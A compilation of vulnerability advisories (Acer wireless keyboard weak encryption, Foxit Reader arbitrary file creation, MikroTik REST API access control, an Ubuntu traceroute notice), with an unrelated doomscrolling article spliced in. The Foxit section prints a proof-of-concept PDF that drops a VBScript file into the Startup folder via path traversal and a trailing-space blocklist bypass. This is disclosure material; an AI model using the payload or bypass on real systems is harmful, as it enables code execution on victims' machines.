An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption.

**CVE-2023-48034**

I have discovered weak encryption used in the wireless protocol of the Acer Wireless Keyboard SK-9662 (FCC ID: H4IKB9662). This weak encryption allows an attacker to easily monitor and log keystrokes and also inject arbitrary keystrokes.

**Intro**

The keyboard uses a Texas Instruments CC2545 chip, transmitting data using the Enhanced Shockburst protocol developed by Nordic Semiconductors. The payload consists of 12 bytes, the first byte appears to be a constant value (0x48 in my testing). The second byte is the modifier byte (ctrl, shift etc.), the third and fourth bytes are consumer and power control keys. The fifth thru tenth bytes are the key codes. The eleventh bytes acts as a checksum and the twelfth byte is the random number used for encryption.

**Encryption Scheme**

Payload encryption starts with the generation of a random byte from radio noise. A different byte stored in the firmware (keyvalue) is used as a key for AES. Both the key and random byte are zero padded to 128 bits and sent to the AES coprocessor on the CC2545. The AES coprocessor is configured for CBC mode with a null IV. The output of the AES coprocessor will be referred to as the xorkey. The first eleven bytes of the payload are xor'ed with the corresponding bytes in the xorkey. The random byte is the last byte of the payload in order for the receiver to decrypt the payload.

Decryption of the payload is similar to encryption. The twelfth byte of the payload (the random value) along with the keyvalue (known by the receiver ahead of time) is used to generate the xorkey and xor'ed with the encrypted payload.

**Exploit**

This encryption scheme is easily circumvented due to the use of only a one byte AES key. Since the key is limited to only 256 possible values, the key can be easily brute-forced within seconds. The python script in this repository shows brute force decryption of a captured encrypted packet.

In order for this vulnerability to exploited, an attacker must have means to capture the 2.4 GHz radio traffic. This requires close physical proximity to the target keyboard. However, once a single packet is captured, the AES key can be brute-forced within seconds and real-time keylogging and keystroke injection is possible, allowing access to the victim's computer. A popular wireless hacking tool, jackit (https://github.com/insecurityofthings/jackit), can be extended to support sniffing and injecting keystrokes into nearby SK-9662 keyboards all on a cheap 2.4 GHz USB dongle.

**Mitigation**

The SK-9662 keyboard is an obsolete product. An update mechanism for the keyboard does not exist and users should discontinue usage of the vulnerable keyboard. Acer recommends switching to a newer keyboard product.

CVE-2023-48034: GitHub - aprkr/CVE-2023-48034: Weak encryption in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject wireless arbitrary keystrokes.

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**SUMMARY**

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

**PRODUCT URLS**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-73 - External Control of File Name or Path

**DETAILS**

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an arbitrary file creation vulnerability in the way Foxit Reader handles the exportDataObject method of the Doc object. The exportDataObject method extracts the data object specified via the cName parameter to an external file. This method can launch the file once it is created if the nLaunch parameter of the method is set to 2. This can be illustrated by the following proof-of-concept code:

    5 0 obj
    <</S/JavaScript/JS(\n\nfunction main {
    this.exportDataObject${ cName:"MyData", nLaunch: 2}$;
    
    }
    main;
    )/Type/Action>>
    endobj
    
    6 0 obj
    <</Length 6/Params<</ModDate(D:20230731134730-08'00')/Size 6/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>/CreationDate(D:20230731133537-08'00')>>/Subtype/application#2Fhta/Type/EmbeddedFile>>
    stream
    <job>
      <script language="VBScript">
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c calc.exe"
      </script>
    </job>
    endstream
    endobj
    
    7 0 obj
    <</UF(..\/..\/..\/..\/..\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/exploit.wsf )/EF<</F 6 0 R>>/Desc()/F(exploit.wsf)/Type/Filespec>>
    endobj
    
    8 0 obj
    <</EmbeddedFiles 9 0 R>>
    endobj
    
    9 0 obj
    <</Names[<FEFF004D00790044006100740061>7 0 R]>>
    endobj
    

Here, the object 9 contains the MyData data object. FEFF004D00790044006100740061 is the hexadecimal unicode value of the string MyData. The exportDataObject method extracts this data object and writes it to the file indicated by the UF key of the object 7. In this case, a WSF file is written to the disk. The content of the file is the stream object of the object 6, which contains the VBScript code to run the calc.exe application.

The Foxit application saves the new file to the temp directory, but it doesn’t check for the directory traversal characters, i.e. dot-dot-slash (“../”), before appending the filename indicated by the UF key to the temporary directory path. This allows the use of the directory traversal vulnerability to write files to an arbitrary path.

The application checks the extension of a file against the blocklist filter of 93 known file extensions before calling a method responsible for creating it. The blocklisted extensions are as follows:

    .text:017E47CD mov     [ebp+var_19C], offset aAcm ; "acm"
    .text:017E47D7 mov     [ebp+var_198], offset aAde ; "ade"
    .text:017E47E1 mov     [ebp+var_194], offset aAdp ; "adp"
    .text:017E47EB mov     [ebp+var_190], offset aApp ; "app"
    .text:017E47F5 mov     [ebp+var_18C], offset aAsa ; "asa"
    .text:017E47FF mov     [ebp+var_188], offset aAsp ; "asp"
    .text:017E4809 mov     [ebp+var_184], offset aAspx ; "aspx"
    .text:017E4813 mov     [ebp+var_180], offset aAx ; "ax"
    .text:017E481D mov     [ebp+var_17C], offset aBas ; "bas"
    .text:017E4827 mov     [ebp+var_178], offset aBat ; "bat"
    .text:017E4831 mov     [ebp+var_174], offset aBin ; "bin"
    .text:017E483B mov     [ebp+var_170], offset aCer ; "cer"
    .text:017E4845 mov     [ebp+var_16C], offset aChm_0 ; "chm"
    .text:017E484F mov     [ebp+var_168], offset aClb ; "clb"
    .text:017E4859 mov     [ebp+var_164], offset aCmd ; "cmd"
    .text:017E4863 mov     [ebp+var_160], offset aCnt ; "cnt"
    .text:017E486D mov     [ebp+var_15C], offset aCnv ; "cnv"
    .text:017E4877 mov     [ebp+var_158], offset aCom ; "com"
    .text:017E4881 mov     [ebp+var_154], offset aCpl ; "cpl"
    .text:017E488B mov     [ebp+var_150], offset aCpx ; "cpx"
    .text:017E4895 mov     [ebp+var_14C], offset aCrt ; "crt"
    .text:017E489F mov     [ebp+var_148], offset aCsh ; "csh"
    .text:017E48A9 mov     [ebp+var_144], offset Ext ; "dll"
    .text:017E48B3 mov     [ebp+var_140], offset aDrv ; "drv"
    .text:017E48BD mov     [ebp+var_13C], offset aDtd ; "dtd"
    .text:017E48C7 mov     [ebp+var_138], offset aExe_0 ; "exe"
    .text:017E48D1 mov     [ebp+var_134], offset aFxp ; "fxp"
    .text:017E48DB mov     [ebp+var_130], offset aGrp ; "grp"
    .text:017E48E5 mov     [ebp+var_12C], offset aH1s ; "h1s"
    .text:017E48EF mov     [ebp+var_128], offset aHlp ; "hlp"
    .text:017E48F9 mov     [ebp+var_124], offset aHta ; "hta "
    .text:017E4903 mov     [ebp+var_120], offset aIme ; "ime"
    .text:017E490D mov     [ebp+var_11C], offset aInf_0 ; "inf"
    .text:017E4917 mov     [ebp+var_118], offset aIns ; "ins"
    .text:017E4921 mov     [ebp+var_114], offset aIsp ; "isp"
    .text:017E492B mov     [ebp+var_110], offset aIts ; "its"
    .text:017E4935 mov     [ebp+var_10C], offset aJs_3 ; "js"
    .text:017E493F mov     [ebp+var_108], offset aJse ; "jse"
    .text:017E4949 mov     [ebp+var_104], offset aKsh ; "ksh"
    .text:017E4953 mov     [ebp+var_100], offset aLnk_0 ; "lnk"
    .text:017E495D mov     [ebp+var_FC], offset aMad ; "mad"
    .text:017E4967 mov     [ebp+var_F8], offset aMaf ; "maf"
    .text:017E4971 mov     [ebp+var_F4], offset aMag ; "mag"
    .text:017E497B mov     [ebp+var_F0], offset aMam ; "mam"
    .text:017E4985 mov     [ebp+var_EC], offset aMan ; "man"
    .text:017E498F mov     [ebp+var_E8], offset aMaq ; "maq"
    .text:017E4999 mov     [ebp+var_E4], offset aMar_0 ; "mar"
    .text:017E49A3 mov     [ebp+var_E0], offset aMas ; "mas"
    .text:017E49AD mov     [ebp+var_DC], offset aMat ; "mat"
    .text:017E49B7 mov     [ebp+var_D8], offset aMau ; "mau"
    .text:017E49C1 mov     [ebp+var_D4], offset aMav ; "mav"
    .text:017E49CB mov     [ebp+var_D0], offset aMaw ; "maw"
    .text:017E49D5 mov     [ebp+var_CC], offset aMda ; "mda"
    .text:017E49DF mov     [ebp+var_C8], offset aMdb ; "mdb"
    .text:017E49E9 mov     [ebp+var_C4], offset aMde ; "mde"
    .text:017E49F3 mov     [ebp+var_C0], offset aMdt ; "mdt"
    .text:017E49FD mov     [ebp+var_BC], offset aMdw ; "mdw"
    .text:017E4A07 mov     [ebp+var_B8], offset aMdz ; "mdz"
    .text:017E4A11 mov     [ebp+var_B4], offset aMsc ; "msc"
    .text:017E4A1B mov     [ebp+var_B0], offset aMsi ; "msi"
    .text:017E4A25 mov     [ebp+var_AC], offset aMsp ; "msp"
    .text:017E4A2F mov     [ebp+var_A8], offset aMst ; "mst"
    .text:017E4A39 mov     [ebp+var_A4], offset aMui ; "mui"
    .text:017E4A43 mov     [ebp+var_A0], offset aNls ; "nls"
    .text:017E4A4D mov     [ebp+var_9C], offset aOcx ; "ocx"
    .text:017E4A57 mov     [ebp+var_98], offset aOps ; "ops"
    .text:017E4A61 mov     [ebp+var_94], offset aPal ; "pal"
    .text:017E4A6B mov     [ebp+var_90], offset aPcd ; "pcd"
    .text:017E4A75 mov     [ebp+var_8C], offset aPif ; "pif"
    .text:017E4A7F mov     [ebp+var_88], offset aPrf ; "prf"
    .text:017E4A89 mov     [ebp+var_84], offset aPrg ; "prg"
    .text:017E4A93 mov     [ebp+var_80], offset aPst ; "pst"
    .text:017E4A9A mov     [ebp+var_7C], offset aReg_0 ; "reg"
    .text:017E4AA1 mov     [ebp+var_78], offset aScf ; "scf"
    .text:017E4AA8 lea     ecx, [ebp+var_1A4]
    .text:017E4AAE mov     [ebp+var_74], offset aScr ; "scr"
    .text:017E4AB5 mov     [ebp+var_70], offset aSct ; "sct"
    .text:017E4ABC mov     [ebp+var_6C], offset aShb ; "shb"
    .text:017E4AC3 mov     [ebp+var_68], offset aShs ; "shs"
    .text:017E4ACA mov     [ebp+var_64], offset aSys ; "sys"
    .text:017E4AD1 mov     [ebp+var_60], offset aTlb ; "tlb"
    .text:017E4AD8 mov     [ebp+var_5C], offset aTsp ; "tsp"
    .text:017E4ADF mov     [ebp+var_58], offset aUrl ; "url"
    .text:017E4AE6 mov     [ebp+var_54], offset aVb ; "vb"
    .text:017E4AED mov     [ebp+var_50], offset aVbe ; "vbe"
    .text:017E4AF4 mov     [ebp+var_4C], offset aVbs ; "vbs"
    .text:017E4AFB mov     [ebp+var_48], offset aVsmacros ; "vsmacros"
    .text:017E4B02 mov     [ebp+var_44], offset aVss ; "vss"
    .text:017E4B09 mov     [ebp+var_40], offset aVst ; "vst"
    .text:017E4B10 mov     [ebp+var_3C], offset aVsw ; "vsw"
    .text:017E4B17 mov     [ebp+var_38], offset aWs ; "ws"
    .text:017E4B1E mov     [ebp+var_34], offset aWsc ; "wsc"
    .text:017E4B25 mov     [ebp+var_30], offset aWsf ; "wsf"
    .text:017E4B2C mov     [ebp+var_2C], offset aWsh ; "wsh"
    .text:017E4B33 mov     [ebp+var_28], offset aXsl ; "xsl"
    

This check can be bypassed by adding a space at the end of the file. For example, “exploit.acm” will be blocked but the filename “exploit.acm “ will bypass the above checks and a file with the name exploit.acm will be created. We can observe the following in the debugger (here, the value of the UF key was (exploit.acm )):

    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb5c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4ba5 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad755:
    017e4ba5 6666660f1f840000000000 nop word ptr [eax+eax]
    0:000> pc
    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb3c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4bb7 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad767:
    017e4bb7 e824746d00      call    FoxitPDFReader!safe_vsnprintf+0x52e880 (01ebbfe0)
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76c:
    017e4bbc 50              push    eax                                      ; <--------------------- [1]
    0:000> dd eax
    0b4764e8  0f8ddf50 0f8dd9b0 0f8ddf68 0f8dde60
    0b4764f8  0f8ddea8 0f8dd878 0f8ddad0 0f8dd9e0
    0b476508  0f8dd998 0f8dd9f8 0f8dd860 0f8dda10
    0b476518  0f8dda70 0f8dd8d8 0f8dd9c8 0f8dda28
    0b476528  0f8dda58 0f8dd968 0f8dd908 0f8dd830
    0b476538  0f8dd650 0f8dd938 0f8dda40 0f8dd890
    0b476548  0f8dd8f0 0f8dd8a8 0f8dd920 0f8dd698
    0b476558  0f8dd8c0 0f8dd980 0f8dd848 0f8dd950
    0:000> du 0f8ddf50+c                                             
    0f8ddf5c  "acm"
    0:000> du 0f8dd9b0+c
    0f8dd9bc  "ade"
    0:000> du 0f8ddf68+c
    0f8ddf74  "adp"
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbd esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76d:
    017e4bbd 8d8d5cfeffff    lea     ecx,[ebp-1A4h]
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb60 edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bc3 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad773:
    017e4bc3 e8382f6d00      call    FoxitPDFReader!safe_vsnprintf+0x52a3a0 (01eb7b00) ; <--------------------- [2]
    0:000> dd ecx                                            
    073fdb60  0f8dde18 0fe92208 04a13aec 04a13af4
    073fdb70  04a13afc 04a13b04 04a13b0c 04a13b14
    073fdb80  04a13b1c 04a13b28 04a13b30 04a13b38
    073fdb90  04a13b40 04a13b48 04a13b50 04a13b58
    073fdba0  04a13b60 04a13b68 04a13b70 04a13b78
    073fdbb0  04a13b80 04a13b88 04a13b90 04a13b98
    073fdbc0  049918bc 04a13ba0 04a13ba8 049d1d20
    073fdbd0  04a13bb0 04a13bb8 04a13bc0 04a13bc8
    0:000> du 0f8dde18+c                                        ; <--------------------- [3]
    0f8dde24  "acm "                                          
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bc8 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad778:
    017e4bc8 85c0            test    eax,eax                  ; <--------------------- [4]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bca esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77a:
    017e4bca 745a            je      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad7d6 (017e4c26) [br=0]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bcc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77c:
    017e4bcc 46              inc     esi
    0:000> g
    Breakpoint 6 hit
    eax=0b46e80c ebx=0e70e6e8 ecx=1f2842b4 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3014 esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbc4:
    017e3014 8d8dc4d7ffff    lea     ecx,[ebp-283Ch]
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301a esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbca:
    017e301a 51              push    ecx
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301b esp=073fb700 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbcb:
    017e301b 6801100000      push    1001h
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3020 esp=073fb6fc ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd0:
    017e3020 50              push    eax
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3021 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd1:
    017e3021 8d8dd8d7ffff    lea     ecx,[ebp-2828h]
    0:000> du eax                                                              ; <--------------------- [5]
    0b46e80c  "C:\Users\dev\AppData\Local\Temp\"
    0b46e84c  "$frd_\F9R4B52.tmp\exploit.acm "
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb728 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3027 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd7:
    017e3027 e8f2b38302      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1dcaee (0401e41e)  ; <--------------------- [6]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=1817f444 edx=00000006 esi=073fdfb8 edi=00000000
    eip=017e302c esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbdc:
    017e302c 85c0            test    eax,eax                              ; <--------------------- [7]
    

At [1], the argument of the method at [2] is pushed onto the stack. The value being pushed comes from the register eax, which contains the disallowed file extensions. At [3], the this object of the method contains the extension of the given filename, which is the string “acm “. The method called at [2] performs the string comparison, which fails as the string “acm “ is not present in the disallowed list. The comparison results can be observed at [4]. Later on, the filename was passed to CFile::Open at [6], which created the file successfully. The non-zero value at [7] indicates that the open was successful.

This vulnerability allows the creation of arbitrary files, and the execution of these files leads to arbitrary code execution.

**TIMELINE**

2023-08-28 - Vendor Disclosure  
2023-11-22 - Vendor Patch Release  
2023-11-27 - Public Release

Discovered by Kamlapati Choubey of Cisco Talos.

CVE-2023-40194: TALOS-2023-1833 || Cisco Talos Intelligence Group

There’s a devastating amount of heavy news these days. Psychology experts say you need to know your limits—and when to put down the phone.

Scrolling through social media can feel like a nightmare these days. You’re reading about the horrors of the Israel-Hamas war, and then you’re reading about the horrors of the war between Ukraine and Russia. You’re learning about the latest devastating climate news. Democracy is under threat in America. It can feel like everything is falling apart.

This, of course, can have a significant effect on your mental health. You start to feel overwhelmed. Not only are you dealing with the regular stresses of daily life—your job, your finances, your personal relationships—but now you’re thinking about the most serious problems the world is facing. Social media algorithms tend to elevate the most contentious content, so these feeds are showing you things that will elicit a visceral response—they’re putting the doom in doomscrolling.

According to psychology experts, this has become a serious problem. People are ingesting too much negative news, and it’s not only affecting them personally but impacting society at large. People can handle some bad news, but what if it’s a lot of bad news? And what if a lot of people are doing this while trying to function in the world together?

Matthew Price, a professor of psychological science at the University of Vermont, says that stress is cumulative. One thing starts stressing you out, and then it’s another thing, and then one more thing. Suddenly, you’re spiraling. He says the stress can continue throughout your day even when you’ve stopped bingeing on bad news on social media.

“Some of the work that we have done has shown it definitely increases your stress in the moment. It could increase your stress throughout the rest of your day,” Price says. “When you doomscroll, it gets much easier to reach your limit than I think you would if you weren’t doing that.”

Price says ingesting a lot of negative news can cause anxiety and depression, at least for some period of time, but it’s especially likely to “exacerbate” anxiety, depression, and PTSD in people who have a history of experiencing those conditions. He says that people often doomscroll because there’s something bad going on and they want to find a way to fix the problem they’re reading about.

“When we’re doomscrolling, we’re kind of looking for the resolution to the issue. Read some more posts. Read some more articles. If I get more information, then maybe I’ll understand the problem,” Price says, describing the doomscrolling cycle.

This doesn’t just affect individuals. When a lot of people are experiencing the stress of the news of the world at once, it can make them more likely to “snap at each other,” Price says. We may not realize it, but the reason that guy was rude to you at Starbucks might be that he has read too many damn scary news articles.

“When you have multiple people who are struggling, they’re going to have a harder time communicating together,” says Bethany Teachman, a professor of psychology at the University of Virginia. “We have to think of these things from a systemic perspective or we’re not going to be very effective at making change.”

Teachman says doomscrolling can “skew our sense of what’s going on.” You start to think everything and everyone is the worst, but it’s quite possible little of it is actually affecting you personally. Perhaps terrible news from around the world would not be changing your daily life unless you were reading about it, and it’s important to recognize when it’s time to log off.

“We do need to stay informed, but when we move past informed to feeling overwhelmed and often paralyzed and feeling like we’re under constant threat, it’s clearly crossed over into a negative place,” Teachman says. “I think part of what’s happening is most of the news stories tend to be negative, so it gives us this sense that we’re in a constant state of danger and that we are vulnerable and the world is a very dangerous place.”

In terms of solutions, Teachman says people need to limit their exposure to social media and the news to keep their lives balanced. It’s OK to read some news to stay informed and check out what people are saying online, but it can get unhealthy if you overdo it. Once you’ve read enough to know what’s going on, think of other things that you enjoy doing and that help you maintain your mental health, she says.

“It’s not about ‘this is a bad thing and this is a good thing.’ It’s about how you engage with it and how it fits in with the rest of what’s going on in your life,” Teachman says. “How are you living the rest of your life, and what are the impacts on that?”

If you’re feeling overwhelmed by the news, Teachman says it’s important to consider what your values are and how you can act on those values in your daily life. Think about who you want to be and what you want to accomplish. This can focus your mind when you’re feeling overwhelmed.

If you’re not feeling like you’re who you want to be right now, she says, think of small things you can do to get closer to becoming that person. Think about the things you can do to get closer to that goal so you’re more capable of handling stress and feeling mentally well, and about the things you can do to help solve the problems you’re worried about.

“Take a step back from your social media. Take a step back from your phone. Take a step back from the stressors unless the thing that’s stressful is imminently going to harm you,” Price says. “And get more local.”

Price says that acting locally on issues you’re concerned about can help you maintain your mental health because otherwise things can feel too far away and too difficult to solve. Maybe you can’t end a war, but perhaps you can help some people in your community or get your community to do something that helps a bigger problem.

People are overwhelmed. They’re tired. Sometimes you want to just curl up in a ball and pull your comforter over your head. Teachman says that’s the worst thing you can do for your mental health. It’s important to connect with people to maintain your mental health, she says, and sometimes you can connect with people and be part of the solution to a problem at the same time.

It's Time to Log Off

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

Recently, Mikrotik added a REST server as a new API for managing the router. It is a nice alternative to their proprietary API when automating RouterOS.

However, young software usually contains bugs. Sometimes, these bugs are security-related, and, together with not-so-safe defaults, they may create a vulnerability.

This vulnerability has been assigned the ID CVE-2023-41570.

**Background**

RouterOS (from Mikrotik) is a closed-source Linux-based operating system for network appliances, specifically switches, routers and firewalls. It is used in Mikrotik appliances (such as RouterBOARD), but it can be downloaded and installed on other devices and virtual machines.

The management interfaces of RouterOS include SSH, MAC-Telnet, Winbox (a proprietary Windows-only tool), Webfig (a web user interface), and a proprietary API (additionally, ISPs have also TR-069). Since version v7.1beta4, RouterOS also includes a REST server. The REST server is started as a sub-resource of Webfig at /rest. More information on the RouterOS REST API web page.

**Authentication**

RouterOS supports local and remote user authentication and authorization databases (via RADIUS). Users belong to _groups_, each with its own permissions set. The resulting permission set is additive – it is the sum of all permissions granted by groups.

By default, only the local database is used, and three groups are present: full, with unlimited access to the router; write, with almost complete access except for file transfer (to/from the router itself) and user policies, and read, with read-only access (plus reboot privileges). Also, by default, rest-api is a specific permission granted to all groups.

Users may be restricted to logging in only from specific IP addresses or networks.

**The vulnerability**

REST APIs are protected by HTTP Basic authentication. You should provide a valid username and password pair. The username must have the rest-api (which, by default, is granted to all groups).

The vulnerability lies in the fact that, while other interfaces (SSH, Webfig, etc.) check whether the user is authorized to log in from that specific IP address, this is not the case for the REST server. **Users can access the REST server from any IP address**, even if they are not authorized in the users’ database.

To exploit this vulnerability:

*   the attacker must have a username and password pair that has rest-api permission (but no permission to log in from the attacker IP address);
*   the firewall should allow access to the web user interface from the IP address of the attacker;
*   Webfig (the web UI) must be enabled: the REST server is part of Webfig.

Note that, by default, all groups have the rest-api permission (any user is allowed to use REST APIs), and Webfig is enabled. There is no way to disable the REST server, as it is integrated into Webfig. This is unexpected; usually, services like SSH or proprietary APIs are under the “IP” -> “Services” menu with their independent entry. At the very least, there should be a flag in the Webfig service www to enable the REST server selectively (defaulting off).

So, I think the majority of those who left Webfig active don’t realize that they are exposing the REST endpoint too, and that every user can access it, regardless of the IP filter configured in the user database.

To exacerbate the problem, the read group has some dangerous permissions: sniff (to intercept traffic), reboot, and sensitive (read sensitive information, such as Wi-Fi passwords or IPSec pre-shared keys). I certainly do not expect a “read” user to reboot the router.

**Mikrotik advisory and solution**

Mikrotik released RouterOS version 7.12 with the fix (the changelog contains only a generic reference to “www - fixed allowed address setting for REST API users”).

**Timeline**

I followed the responsible disclosure process described in the “Responsible disclosure of discovered vulnerabilities” page. I reported the vulnerability at 2023-08-19 09:46:00 UTC and received the ACK at 2023-08-24 07:43:00 UTC. The fix was released in version 7.12 at 2023-11-09 09:45:00 UTC (time point from RouterOS changelog).

CVE-2023-41570: CVE-2023-41570: Access Control vulnerability in MikroTik REST API

Ubuntu Security Notice 6478-1 - It was discovered that Traceroute did not properly parse command line arguments. An attacker could possibly use this issue to execute arbitrary commands.

==========================================================================  
Ubuntu Security Notice USN-6478-1  
November 14, 2023

traceroute vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Traceroute could be made to execute arbitrary commands.

Software Description:  
- traceroute: Traces the route taken by packets over an IPv4/IPv6 network

Details:

It was discovered that Traceroute did not properly parse command  
line arguments. An attacker could possibly use this issue to  
execute arbitrary commands.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.22.04.1~esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.20.04.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
